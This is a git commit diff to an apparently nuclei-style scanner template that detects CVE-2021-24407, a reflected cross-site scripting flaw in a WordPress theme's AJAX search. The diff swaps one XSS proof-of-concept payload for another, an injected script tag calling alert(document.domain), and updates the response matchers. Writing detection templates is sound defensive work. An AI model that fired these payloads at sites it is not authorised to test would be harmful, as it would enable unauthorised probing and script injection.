Update CVE-2021-24407.yaml

patch-1
Prince Chaddha 2021-09-16 22:46:36 +05:30 committed by GitHub
parent 7a88129ee8
commit ac93a8acaf
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 6 additions and 6 deletions

View File

@ -8,7 +8,7 @@ info:
reference:
- https://wpscan.com/vulnerability/fba9f010-1202-4eea-a6f5-78865c084153
- https://nvd.nist.gov/vuln/detail/CVE-2021-24407
tags: cves,cve2021,wordpress,xss
tags: cves,cve2021,wordpress,xss,wp-theme
requests:
- raw:
@ -18,20 +18,20 @@ requests:
Accept: */*
Content-Type: application/x-www-form-urlencoded
action=tie_ajax_search&query[]=<svg+onload=alert(document.domain)>
action=tie_ajax_search&query[]=</script><script>alert(document.domain)</script>
matchers-condition: and
matchers:
- type: word
words:
- '<svg+onload=alert(document.domain)>'
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
words:
- 'Content-Type: text/html'
part: header
words:
- text/html
- type: status
status: